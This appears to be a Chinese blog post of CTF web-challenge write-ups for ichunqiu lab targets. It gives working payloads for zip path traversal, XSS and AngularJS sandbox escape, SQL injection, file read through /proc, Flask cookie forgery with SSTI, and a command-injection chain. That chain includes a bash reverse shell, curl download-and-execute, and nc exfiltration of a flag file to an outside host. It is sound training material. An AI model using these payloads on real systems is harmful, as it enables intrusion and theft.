ctf之WEB练习二

以你之姓@ 2024-03-31 11:36 22阅读 0赞

题目名称：从0到1CTFer成长之路-Web文件上传

题目wirteup:

启动题目场景，获得题目靶场，访问网站，发现是一个文件上传漏洞，并且源代码也显示出来。

[http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/][http_eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com]

![0c3009e58b4e8b7622e7827613251a78.png][]

源代码大概如下分析：

<?php

header("Content-Type:text/html; charset=utf-8");

// 每5分钟会清除一次目录下上传的文件

//会包含文件pclzip.lib.php，感觉这个php里面是有一些针对zip包进行解压等的操作的

require\_once('pclzip.lib.php');

//要是没上传文件，就输出上传页面

if(!$\_FILES)\{

echo '省略的HTML'

show\_source(\_\_FILE\_\_);

\}else\{

$file = $\_FILES\['file'\];

//限制上传的文件名不为空

if(!$file)\{

exit("请勿上传空文件");

$name = $file\['name'\];

$dir = 'upload/';

//strrchr($name, '.')

//strrchr() 函数查找字符串在另一个字符串中最后一次出现的位置，并返回从该位置到字符串结尾的所有字符。

//比如上传的文件名为$name=1.php.txt，这里strrchr($name, '.') 执行结果为.txt

//substr(strrchr($name, '.'), 1)

//substr字符串截取，从下标为1开始截取，那就是把点略过，截取后为txt

//通过strtolower函数将所有字符转换为小写，赋值给ext变量

$ext = strtolower(substr(strrchr($name, '.'), 1));

//如果我们上传的文件名为1.txt，那么path变量就为upload/1.txt

$path = $dir.$name;

//检查是否为目录

function check\_dir($dir)\{

$handle = opendir($dir);

while(($f = readdir($handle)) !== false)\{

if(!in\_array($f, array('.', '..')))\{

if(is\_dir($dir.$f))\{

check\_dir($dir.$f.'/');

\}else\{

$ext = strtolower(substr(strrchr($f, '.'), 1));

if(!in\_array($ext, array('jpg', 'gif', 'png')))\{

unlink($dir.$f);

//创建目录

if(!is\_dir($dir))\{

mkdir($dir);

//将目录名拼接一个随机数，读到这里，基本上就知道需要路径穿越了，因为我们不知道随机数值，所以就算绕过上传，解析也是一大关

$temp\_dir = $dir.md5(time(). rand(1000,9999));

if(!is\_dir($temp\_dir))\{

mkdir($temp\_dir);

//首先进行后缀的校验，把刚刚拿到的，最后一个.后面的字符串和这里的zip、jpg、gif、png进行对比校验

if(in\_array($ext, array('zip', 'jpg', 'gif', 'png')))\{ //使用白名单校验，只允许zip、jip、gif、png 上传

if($ext == 'zip')\{ //如果使用zip 上传，下面就是zip解压流程规则

//使用PclZip进行解压缩

$archive = new PclZip($file\['tmp\_name'\]);

//遍历解压缩后的每个目录

foreach($archive->listContent() as $value)\{

$filename = $value\["filename"\];

//一段较为简单的正则，就是匹配每个文件结尾的位置，是否是.php ，如果是则退出解压程序

if(preg\_match('/\\.php$/', $filename))\{

exit("压缩包内不允许含有php文件!");

if ($archive->extract(PCLZIP\_OPT\_PATH, $temp\_dir, PCLZIP\_OPT\_REPLACE\_NEWER) == 0) \{

check\_dir($dir);

exit("解压失败");

check\_dir($dir);

exit('上传成功!');

\}else\{

move\_uploaded\_file($file\['tmp\_name'\], $temp\_dir.'/'.$file\['name'\]);

check\_dir($dir);

exit('上传成功!');

\}else\{

exit('仅允许上传zip、jpg、gif、png文件!');

大概代码是需要将php文件先压缩成zip文件压缩包，然后绕过路经检测，通过路径穿越将文件放到指定目录，然后访问上传的文件名

如果将解压出的文件穿越到非upload目录，check\_\_dir方法就无法删除该文件。zip压缩包被解压到/upload/随机md5/目录下，所以需要穿越两个目录，由于我们上传的路径目录是upload/随机值/上传的文件，需要穿越两层，直到根目录下，一层随机目录，一层upload

所以需要文件名为…/…/file.php，由于需要构造解析，利用apache的解析漏洞，如果从右开始，直到哪个能识别就解析哪个，构造最终文件名为../../hhhh.php.xxx，这个文件名长度为18位

windows操作系统下，右键创建文件，文件名随便写一个18位的(跟刚刚的文件名位数一样)，这里是把后缀涵盖的，例如：123456789012345678

![ab54e9bca687ad3e3c5821feb2ca4e01.png][]

然后我用的WinRar，右键添加到zip

![82d4b343de24f7757eadfad42abe2c43.jpeg][]

接下来就开始用010 Editor进行zip文件的编辑，我们分别将char frFileName\[18\]修改为hhhh.php.xxx和char deFileName\[18\]修改为../../hhhh.php.xxx

，然后保存压缩文件

![0d19530229834589dc1309680242ee32.png][]

![c849ba3c485d1146c7fcf44d364eeefe.png][]

![acc8ff108ff03be8dcadb6f82e6b73d2.png][]

对压缩文件进行上传成功后，会进行自动解压缩

![e6c05d04408d681057072e8d1311d58b.png][]

然后访问以下路径，即可获得flag

http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/hhhh.php.xxx

![99b260c28d47807d3cb20e4a29a30135.png][]

最终flag:

n1book\{ThisIsUpLoadToPicfl4g\}

题目名称：从0到1CTFer成长之路-XSS闯关

题目wirtup:

启动题目场景，获得题目靶场，访问网站，发现是一个通关的XSS游戏获取flag

第一关，输入常规的XSS poc: 
          
          
          <img
          
           src=x onerror=alert(0)> 即可进入下一关

http://eci-2ze4s8hmmy8zzvishpc5.cloudeci1.ichunqiu.com/level1?username=<img
            
             src=x onerror=alert(0)>

![5f4556a1a7dfa6b1ae12da4d990e96ec.png][]

第二关，输入测试<xss>poc，查看源代码，发现没有过滤<和>，然后对其进行闭合标签即可

![511235b7e4b741284d67cf8ae58163c6.png][]

这里通过输入';alert(0);//，即可进入下一关

http://eci-2ze4s8hmmy8zzvishpc5.cloudeci1.ichunqiu.com/level2?username=12';alert(0);//

![a9a066cb4e25792f9db87bdc2eec6102.png][]

第三关，输入上一关的poc: ';alert(0);// 发现单引号被转义成/'

![0c27ca5678657a37485d61a2df062d7e.png][]

这里通过再次输入一个单引号，即可绕过一个单引号的转义，最终poc:12'';alert(0);// 提交，即可进入下一关

http://eci-2ze4s8hmmy8zzvishpc5.cloudeci1.ichunqiu.com/level3?username=12'';alert(0);//

![ebfa5738e878c34172266f7e20246d60.png][]

第4关，查看源代码发现有一个自动跳转的变量jumpUrl

![403d97c40b719a4a019d27e770e81997.png][]

代码中接收jumpUrl作为跳转url,伪链接javascript:alert(1)，浏览器会把javascript后面的那一段内容当做代码，直接在当前页面执行，即可进入下一关。

http://eci-2ze4s8hmmy8zzvishpc5.cloudeci1.ichunqiu.com/level4?jumpUrl=javascript:alert(0)

![5a5c6f2c8a8ab986aa80e2984625bfd5.png][]

第五关，表单中直接输入一个测试数字，提交

![c4ec1b0902697a8e7db1c69320c1cf2b.png][]

发现现实错误

![12c592bc8133e7e2734c7ec195cac767.png][]

查看源代码，发现有JS 2条IF判断条件限制着。

![9d70d39c905a4fa422bc9d1440538dfd.png][]

限制1：

if(getQueryVariable('autosubmit') !== false){

绕过限制：

autosubmit=1

限制2

autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');

绕过限制：

action=javascript:alert(0)

同样是传值，只不过是传我们的注入语句，提交完整payload：/level5?autosubmit=1&action=javascript:alert(0)

即可进入下一关。

http://eci-2ze4s8hmmy8zzvishpc5.cloudeci1.ichunqiu.com/level5?autosubmit=1&action=javascript:alert(0)

![1172f7ec5bdb0c5171455f075f539749.png][]

输一个一个测试<xss>发现<和>已经被转义了

![813015f3a5a75731e6d0fb18e1a8a4d1.png][]

查看源代码，发现该关题目使用的AngularJS

![bf7bb423ff91a691d0deeb73333eee0e.png][]

点击https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js，发现AngularJS版本为1.4.6

![412a6bbdbbdef43921501ee568c066af.png][]

也可以通过chrome的Wapplayzer插件进行查看

![23edbce57d7cda7e08231a2bbc8bd168.png][]

我们的Angular版本是1.4.6，低于1.6版本，那么存在沙箱，利用逃逸沙箱POC:

{
           {'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

访问上面的沙箱poc，即可进入下一关。

![05b97139f780099459e2cb8cdeb0609a.png][]

下一关显示了flag的内容

![7287ea2c99c444afd25eeb88f19af9f8.png][]

最终flag:

n1book\{xss\_is\_so\_interesting\}

题目名称：从0到1CTFer成长之路-死亡之ping

题目内容：

路由器管理台经常存在的网络ping测试，开发者常常会禁用大量的恶意字符串，试试看如何绕过呢？

题目writeup:

启动题目场景，获得靶场，访问网站，并输入测试ping 127.0.0.1，发现可以成功，但是没有回显到页面上。

http://eci-2zed552151f9re6faxx2.cloudeci1.ichunqiu.com/

![794cdb9000358b934e753e7f5b3919bb.png][]

该题目存在一些黑名单过滤的，这里输入一个测试符号&,提交，显示ip包含恶意字符。

![6d02d854c02b1893da0c42b42c8d7f6b.png][]

这里通过bupsuit的intruder进行fuzz 常用的键盘符号。

常用的fuzz 键盘符号：

\#!

(

((

\[\[

;

![7fcca4772c9714fa5b01bb49b2b67b80.png][]

![61b27c8277c709a956d802b650cce0f0.png][]

fuzz出这些符号：+ / = < > ,? <> 没有被过滤

通过%0a，表示换行，并能连接新的一条命令进行执行(不能在浏览器中直接提交%0a，否则会自动转换成url编码提交会报错)，因此建议在 burp中抓包后修改提交请求.

首先在测试%0als，是可以执行成功，证明%0a可以绕过执行

ip=127.0.0.1%0als

![691f3b7c8568a0cbbebeed50dbe657b9.png][]

这里直接测试下bash反弹，发现有特殊的字符(如&已经被拦截了)是反弹不成功的

ip=127.0.0.1%0abash -i >& /dev/tcp/36.xx.xx.223:8080 0>&1

![1b20a7d8258aff4e058f06e5a8eafec6.png][]

在公网主机vps上编写flag.sh脚本内容如下：

cat /FLAG | nc 192.168.1.5 2333

并且在公网主机VPS上使用python搭建http服务，端口为80(一定是80端口)，如果使用其他端口，则使用curl下载的时候需要用到:端口号访问， :符号则在被拦截范围中。

python -m SimpleHTTPServer 80

![6685770cc651f3f2bbc0feb93702bd73.png][]

使用curl命令从vps 主机下载flag.sh到靶机系统中的tmp目录下，一般tmp目录具有可读写权限。

ip=127.0.0.1%0acurl 36.xx.xx.223/flag.sh > /tmp/flag.sh

![45011fc0169b7e620238dd279b61a6f5.jpeg][]

使用chmod命令远程修改已下载的flag.sh文件的可读写执行权限

ip=127.0.0.1%0achmod 777 /tmp/flag.sh

![593ab577493b6aa695fe7034cbf6387b.png][]

通过sh命令远程执行靶机中的flag.sh脚本

ip=127.0.0.1%0ash /tmp/flag.sh

![68fb00797fd737431f9dbb5c62df791a.png][]

vps本地监听，且nc反弹出来靶机中的输出命令信息的内容包含了flag

![bbc0ee061e0291f04a900b04bee643b3.png][]

最终flag:

n1book\{6fa82809179d7f19c67259aa285a7729\}

题目名称：从0到1CTFer成长之路--afr\_3

题目witeup:

访问靶机网站，这里输入测试 test内容，发现页面回显也显示test

http://eci-2ze6rqbmu4jlf86hemsa.cloudeci1.ichunqiu.com/

![e2a81af8af49322e7f544d41852c4785.png][]

![ac09d78615dc2202dc9d70bdc1aa1572.png][]

猜测是存在ssti注入，这里输入测试\{ \{7+7\}\}，页面显示+被过滤，也没相加执行，显然猜测是错误的。

![325396564b7a249b0f5327e811b88757.png][]

继续访问article超链接，看起来像参数存在文件包含或者sql注入漏洞

http://eci-2ze6rqbmu4jlf86hemsa.cloudeci1.ichunqiu.com/article?name=article

![4e987342f4196406b2229df8849911c3.png][]

这里通过bupsuit进行fuzz测试常用的文件包含，可以看到在../../etc/passwd路径读取系统的passwd

![52da51840ba1f945f17c40b0b544a483.png][]

猜测flag在系统的根目录下，于是然后尝试读取一下根目录下的flag，但是提示没有权限

![c978691b180ebb0d0aa5faeec752fa17.png][]

tps:

常用的环境变量配置读取：

/proc/sched\_debug \# 提供cpu上正在运行的进程信息，可以获得进程的pid号，可以配合后面需要pid的利用

/proc/mounts \# 挂载的文件系统列表

/proc/net/arp \# arp表，可以获得内网其他机器的地址

/proc/net/route \# 路由表信息

/proc/net/tcp and /proc/net/udp \# 活动连接的信息

/proc/net/fib\_trie \# 路由缓存

/proc/version \# 内核版本

/proc/\[PID\]/cmdline \# 可能包含有用的路径信息

/proc/\[PID\]/environ \# 程序运行的环境变量信息，可以用来包含getshell

/proc/\[PID\]/cwd \# 当前进程的工作目录

/proc/\[PID\]/fd/\[\#\] \# 访问file descriptors，某写情况可以读取到进程正在使用的文件，比如access.log

尝试读取系统当前运行那些程序并且查看进程，这里fuzz /proc/self/cmdline读取系统进程,最终遍历到目录../../../proc/self/cmdline读取，成功执行并回显:python server.py,说明该题应该是一个python的环境

![7107a3715a647b24539c22c430ed62bd.png][]

又根据以往经验尝试读取../../../app/server.py 和../../../server.py都不能读取

![45c5f54081cf5392a419e2921f950f51.png][]

尝试读取系统环境，这里fuzz /proc/self/environ 读取系统环境变量，最终遍历到目录../../../proc/self/environ读取，成功执行并回显出server.py的路径为/home/sssssserver和flag信息

![b19d5e1c6179c516a6f4667f04e7d608.png][]

提交flag发现出错，证明不是真正的flag

![cc8cdd7515723186156295d26c38a5a0.png][]

于是读取/home/sssssserver/server.py，成功读取到其源码

../../../home/sssssserver/server.py

![c93024ff632102faafef8a58c8cf0676.png][]

回显出来的源码通过html decode 后得到server.py:

import os

from flask import ( Flask, render\_template, request, url\_for, redirect, session, render\_template\_string )

from flask\_session import Session

app = Flask(\_\_name\_\_)

execfile('flag.py')

execfile('key.py')

FLAG = flag

app.secret\_key = key

@app.route("/n1page", methods=\["GET", "POST"\])

def n1page():

if request.method != "POST":

return redirect(url\_for("index"))

n1code = request.form.get("n1code") or None

if n1code is not None:

n1code = n1code.replace(".", "").replace("\_", "").replace("\{","").replace("\}","")

if "n1code" not in session or session\['n1code'\] is None:

session\['n1code'\] = n1code

template = None

if session\['n1code'\] is not None:

template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session\['n1code'\]

session\['n1code'\] = None

return render\_template\_string(template)

@app.route("/", methods=\["GET"\])

def index():

return render\_template("main.html")

@app.route('/article', methods=\['GET'\])

def article():

error = 0

if 'name' in request.args:

page = request.args.get('name')

else:

page = 'article'

if page.find('flag')>=0:

page = 'notallowed.txt'

try:

template = open('/home/nu11111111l/articles/\{\}'.format(page)).read()

except Exception as e:

template = e

return render\_template('article.html', template=template)

if \_\_name\_\_ == "\_\_main\_\_":

app.run(host='0.0.0.0',port=80, debug=False)

对其源码进行审计发现，flag在flag.py中。还发现确实存在模板注入，虽然下面这语句存在过滤

if n1code is not None:

n1code = n1code.replace(".", "").replace("\_", "").replace("\{","").replace("\}","")

同时又发现flask函数的中存在key.py，而appkey又在key.py中,但是此处任意文件读取漏洞被过滤了关键词flag

下面语句存在ssti模板注入，模板渲染的内容就是n1code，但是其实n1code的来源可以是session，前提是可以伪造flask的cookie。

if session\['n1code'\] is not None:

于是读取key.py

../../../proc/self/cwd/key.py

![93e86d58c6ac139d339453dcce8a10d6.png][]

成功读取到appkey：

key = 'Drmhze6EPcv0fN\_81Bj-nA'

使用 [flask-session-cookie-manager][] 进行生成伪造cookie：

[https://github.com/noraj/flask-session-cookie-manager][flask-session-cookie-manager]

$ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager

$ python3 setup.py install

下面通过 flask\_session\_cookie\_manager3.py直接生成加密的cookie:

python3 flask\_session\_cookie\_manager3.py encode -s "Drmhze6EPcv0fN\_81Bj-nA" -t "\{'n1code': '\{ \{\\'\\'.\_\_class\_\_.\_\_mro\_\_\[2\].\_\_subclasses\_\_()\[71\].\_\_init\_\_.\_\_globals\_\_\[\\'os\\'\].popen(\\'cat flag.py\\').read()\}\}'\}"

![203e11cc2af9546f29e9b26c63da3949.png][]

生成的加密的cookie值：

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD\_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-\_961IZcb-k3vcr3\_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YQ6\_6A.Uv6wMG2nUKf-4u\_HURW3HRKGMp8

通过伪造cookie，即可获得flag

![dd482c69019e85bcc494b2a1a858db9a.png][]

最终flag:

n1book\{afr\_3\_solved\}

题目名称：从0到1 CTFer成长之路--afr\_2

题目writeup:

打开靶机网站，发现是一张图片

![1e73c2fb4d3e98926319f535cd5e2f69.jpeg][]

查看源代码，发现有图片路径

![7f5bdbe34a637b22b41fe87129e31bd3.png][]

访问图片路径的根目录，可以看到，看起来像目录遍历

http://eci-2ze39wd1b4km7p6s56t6.cloudeci1.ichunqiu.com/img/

![162854d0594a07b4ca5d22d8c4cd1560.png][]

或者通过御剑目录扫描工具，也可以扫描到img目录

![e6e42246acf76b02ba9c48b1cf15071c.png][]

![96fb73e12961cc3156050a8244221652.png][]

尝试在img 目录后加上../，即可返回到上层目录，并可以遍历到flag文件

[http://eci-2ze39wd1b4km7p6s56t6.cloudeci1.ichunqiu.com/img../][http_eci-2ze39wd1b4km7p6s56t6.cloudeci1.ichunqiu.com_img..]

![b3c100c3d5575ecb056ffe09a67669c2.png][]

下载flag文件，可以看到包含了flag内容

![6f2bee882f55720c2dce512f8c3bd857.png][]

最终flag:

n1book\{afr\_2\_solved\}

题目名称：从0到1 CTFer成长之路--afr\_1

题目writeup:

访问靶机网站，发现输入的参数?p=hello，在页面中显示hello world,靶机路径出现这样的参数?p=测可能存在任意文件包含漏洞

![00cbd3cbfeaf63d159958327e8c2c37e.png][]

尝试任意文件包含读取/etc/passwd，发现没有显示出来，猜测可能被过滤了

http://eci-2ze8zoog6qcqj933081i.cloudeci1.ichunqiu.com/?p=../../../etc/passwd

![1559fc88a09ffff3dff2a4d23bdc4928.png][]

尝试任意文件包含读取flag.php,页面还是显示空白，也有可能被过滤

http://eci-2ze8zoog6qcqj933081i.cloudeci1.ichunqiu.com/?p=php://filter/read=convert.base64-encode/resource=flag.php

![82185bde46e4cfc45ad55e9d03fe5f7d.png][]

尝试任意文件包含读取flag，页面有显示，但是并没有显示出flag

http://eci-2ze8zoog6qcqj933081i.cloudeci1.ichunqiu.com/?p=falg

![5c7069329e0eeafd4cd275f1febf51e0.png][]

联想到php中可以是用php://fiter读取flag,可以正常读取出内容，且内容是base64加密的(但是读取 flag.php的时候显示空白，理论上是可以读取，猜测这里可能题目后面的参数变量会自动加上.php)

http://eci-2ze8zoog6qcqj933081i.cloudeci1.ichunqiu.com/?p=php://filter/read=convert.base64-encode/resource=flag

![a21afdc8df126ba322424cb63e965afe.png][]

读取出来的内容为：PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

通过在线base64解密网站对其进行解密，发现是一段php代码，代码注释中就包含了flag内容

![f23465418101fd88536578c8fbc822ab.png][]

最终flag:

n1book\{afr\_1\_solved\}

题目名称：从0到1 CTFer成长之路--SQL注入-2

题目writeup:

打开靶机题目网站，发现有2个连接

![c50306e57b6a457ab190cfd73296c36b.png][]

其中lonin.php连接是一个登陆页面

![6748d6ea9c11924471e077b7ffc91f2c.png][]

另外一个user.php,发现没任何内容

![c5fab4ff5f9f76fbca74cc0c46026bcf.png][]

方法一：

登陆窗口处，猜测账号文本框中可能存在注入，下面尝试测试是否存在注入

[http://eci-2zecs6kiq0ct6o6vbdmm.cloudeci1.ichunqiu.com/login.php?tips=1][http_eci-2zecs6kiq0ct6o6vbdmm.cloudeci1.ichunqiu.com_login.php_tips_1]

post:  
name=admin'&pass=123

![d9c776eacec0836ed7a63dc85e3ef40c.png][]

发现页面报错，存在SQL注入

测试SQL语句的闭合符号\#，这里\#通过URL编码为%23

name=admin'%23&pass=123

![50fc6aed999d1327653c835b899fbb5a.png][]

发现页面显示正常，说明\#是该SQL语句的闭合符号

测试SQL注入存在的字段数

name=admin'order by 3%23&pass=123 \#先测试3个字段，页面显示正常

![8491800075c615e29a1578d693efbe6c.png][]

name=admin'order by 4%23&pass=123 \#再测试4个字段，页面显示错误

![7e46908885278d1ad3773114e34cba94.png][]

那么SQL注入中存在3个字段数

通过union selcet联合查询语句查询字段回显位置

name=admin'union select 1,2,3%23&pass=123

![7deb838b3904ebb4b34dc57751539508.png][]

发现页面报错，可能union select语句被过滤导致的错误

将selcet 关键字修改为大写的SELECT，提交，发现页面正常显示，说明select大写可以绕过过滤

name=admin'union SELECT 1,2,3%23&pass=123

![2b0023209188024b9841acd4038d4bf6.png][]

既然联合查询语句无法进行注入，这里尝试通过updatexml报错函数进行查询，下面报错查询出数据库的版本

name=admin'and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)%23&pass=123

![b3c14d05c85aa715fd21211c8450007d.png][]

报错查询出数据库的版本为：5.5.64-MariaDB-1ubuntu0.14.04.1

报错查询出用户名

name=admin' and updatexml(1,concat(0x7e,(select user()) ,0x7e),1)%23&pass=123

![16ed011fee0db84631a18ea5f27767db.png][]

用户名：root@localhost~

报错查询出当前数据库名

name=admin'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)%23&pass=123

![dd7d891f0e0c0cdc355a2af46d061438.png][]

数据库名为：note

报错查询出当前数据库note的表名

name=admin'and updatexml(1,concat(0x7e,(SELECT(group\_concat(table\_name))from information\_schema.tables where table\_schema=database())),1)%23&pass=123

![2bab78b3023ebab23235ce37ea9942b8.png][]

爆出表名：fl4g,users

爆出查询出flag表名的字段名

name=admin'and updatexml(1,concat(0x7e, (SELECT(group\_concat(column\_name))from information\_schema.columns where table\_name='fl4g')),1)%23&pass=123

![6b68af8db10925254da304b33daa5b99.png][]

字段名：flag

报错查询出flag字段的内容

name=admin'and updatexml(1,concat(0x7e,(SELECT(flag)from fl4g)),1)%23&pass=123

![8866720a9e292f72ba211e132c6b62d7.png][]

方法二：

这里通过sqlmap进行注入，先输入登录用户名和密码，然后通过bupsuit抓包，保存为data.txt

data.txt:

POST http://eci-2ze6rqbmu4jlnm27n4ea.cloudeci1.ichunqiu.com/login.php HTTP/1.1

Host: eci-2ze6rqbmu4jlnm27n4ea.cloudeci1.ichunqiu.com

Connection: keep-alive

Content-Length: 18

Accept: application/json, text/javascript, \*/\*; q=0.01

DNT: 1

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://eci-2ze6rqbmu4jlnm27n4ea.cloudeci1.ichunqiu.com

Referer: http://eci-2ze6rqbmu4jlnm27n4ea.cloudeci1.ichunqiu.com/login.php

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; UM\_distinctid=17b2110c14b348-029ed0a4395d2d-6373264-144000-17b2110c14c5c3; Hm\_lvt\_2d0601bd28de7d49818249cf35d95943=1628347352; ci\_session=d301e818ba1f28f834072b3fa9b2502add07fee6; Hm\_lpvt\_2d0601bd28de7d49818249cf35d95943=1628391371; \_\_jsluid\_h=977e36203f386ae8a9f4be9791a4a1fe; PHPSESSID=3o3l3jdhc6ftjdbc9ga601bo14

name=admin&pass=12

通过sqlmap探测网站是否存在注入

python sqlmap.py -r data.txt

![3fc52ac1f85380ab432755a49c7b1871.png][]

发现当前靶机网站存在布尔和时间盲注注入

sqlmap爆出当前数据库名

python sqlmap.py -r data.txt \- \- current \- db

![1ea169ea57dbd42631d300373a34f704.png][]

爆出的数据库名:note

sqlmap列出note数据库所有的表名

python sqlmap.py -r data.txt \- D note \- \- tables

![4bc20ba031fc85cb313e92209e69f9d8.png][]

爆出表名:fl4g,users

sqlmap 列出flag表名的所有列名

python sqlmap.py -r data.txt \- D note \- T fl4g \- \- columns

![035bf71910c2df58ac6602ef56a7bdc9.png][]

爆出列名:flag

sqlmap 打印输出flag列名字段值的数据

python sqlmap.py -r data.txt \- D note \- T fl4g \- C flag \- \- dump

![ed0126740f749552a272f0b991dc5e37.png][]

最终 flag:

n1book\{login\_sqli\_is\_nice\}

题目名称：从0到1 CTFer成长之路--SQL注入-1

题目writeup:

访问网站靶机，页面可以正常显示一段内容

http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1

![340e3093c6d4af579605af5e187f3011.png][]

猜测id变量存在sql 注入，这里加入单引号，发现页面和正常页面不一样，说明是存在注入的

http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1'

![ac6142cbc8fd28db1a16d79c47873b04.png][]

通过\#结束注入语句闭合，发现页面显示正常，这里\#在浏览器中以url编码输入。

[http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1' ][http_eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com_index.php_id_1_] %23

![cfe73df1da2228fd0f9e1ee84c93ea2e.png][]

字段查询

使用order by 语句测试字段3不报错，4报错，证明有3个字段

http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1' order by 3%23

![809af55b283149fa5632737a48e14f43.png][]

![6461d6db8ca1e13187c62756ad465bc9.png][]

字段回显查询
                
                
                 
                
                
                 
                  
                 
                 发现在2,3位置有回显,这里id=1要变成-1，因为1的时候，只把查到的第一条显示出来，因此需要输入-1，显示回显全部。

http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,2,3%23

![064363406cdb82f63c6e136a5bbc113c.png][]

数据库查询

联合查询出数据库名为note

http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,database(),3%23

![f08042cf3b22c753d4afb2e96e668ac6.png][]

表名查询

查询出note数据库的表名为：fl4g和notes

http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,group\_concat(table\_name),3 from information\_schema.tables where table\_schema='note' %23

![be00f1b811c975a2aba77ae074427e91.png][]

字段查询

查询出f14g表的字段名为fllllag

http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,group\_concat(column\_name),3 from information\_schema.columns where table\_name='fl4g' %23

![11bdc8131f14b67823177101f628342d.png][]

查询字段内容

查询出fllllag字段的内容为： n1book\{union\_select\_is\_so\_cool\}

http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=-1'union select 1,group\_concat(fllllag),3 from fl4g %23

![022701ea506ab6b6d8e5f8884879cfaa.png][]

方法二：

sqlmap方法：

获取注入点

sqlmap -u "http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1"

![bc904ae584aaafbac79ff113b69c327e.png][]

获取数据库名，发现存在note数据库名

sqlmap -u "http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1" --dbs

![603efa4eeb40463ff6a208c886bb4f31.png][]

3.获取news数据库名中的表名为fl4g和notes表名

sqlmap -u "http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1" --tables -D note

![b35aae931c9824187e1b91f4315e9da8.png][]

4.获取secret\_talbes表中的字段，得到fllll4g字段

sqlmap -u "http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1" -D note -T fl4g --columns

![dc1263d0413286145970c70b493f13ff.png][]

5.获取字段fl4g内容，得到flag

sqlmap -u [http://111.200.241.244:53198 --data "search=1"][http_111.200.241.244_53198 --data _search_1] \-D note -T fl4g -C "fllllag" --dump

![332f152476a08bc7741d390a936bd5e4.png][]

最终flag:

n1book\{union\_select\_is\_so\_cool\}

题目名称：从0到1 CTFer成长之路--粗心的小李

题目writeup:

访问靶场网站，页面内容中传递出该题目和git泄露有关

http://eci-2ze687nrysk8eas2z6vo.cloudeci1.ichunqiu.com/

![6b3b69a6a32ce7851069702cc967c38f.png][]

使用GitHack.py进行扫描，并获得index.html

http://eci-2ze687nrysk8eas2z6vo.cloudeci1.ichunqiu.com/.git/

python GitHack.py

![349e760478c053ac378479b7cbdcca32.png][]

打开index.html，页面内容中包含了flag

![cbc1617a7b46f7fcca55b41f74dc8d36.png][]

最终flag:

n1book\{git\_looks\_s0\_easyfun\}

题目名称：从0到1 CTFer成长之路--常见的搜集

题目内容：一共3部分flag

题目writeup:

访问靶机网站，页面内容显示了关键内容为“敏感文件”那么应该与文件目录有关了。并且根据题目内容描述， flag是三部分组成的。

http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/

![c22a21e8670a3f0a6bfd521062640c1f.png][]

这里通过dirsearch进行目录扫描

python3 dirsearch.py -u http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/

![56b70f63298914110abf06b2e6190b9b.png][]

访问robots.txt路径，得到flag1的内容，为flag第一部分。

[http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/robots.txt][http_eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com_robots.txt]

![fb39f75a8800daae4bca3ba887b455dd.png][]

[http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/flag1\_is\_her3\_fun.txt][http_eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com_flag1_is_her3_fun.txt]

![19243416d7fb4e8598e8b4f04efbdf5b.png][]

flag1的内容： flag1:n1book\{info\_1

访问路径index.php~ ,得到flag2的内容，为flag第二部分

http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/index.php~

![3f338b2d673d36e343b166607f80d07f.png][]

flag2的内容：flag2:s\_v3ry\_im

访问路径.index.php.swp ,得到flag3的内容，为flag第三部分

[http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/.index.php.swp][http_eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com_.index.php.swp]

![ab810d983099354d1e54add2656f2ec9.png][]

flag3的内容：flag3:p0rtant\_hack\}

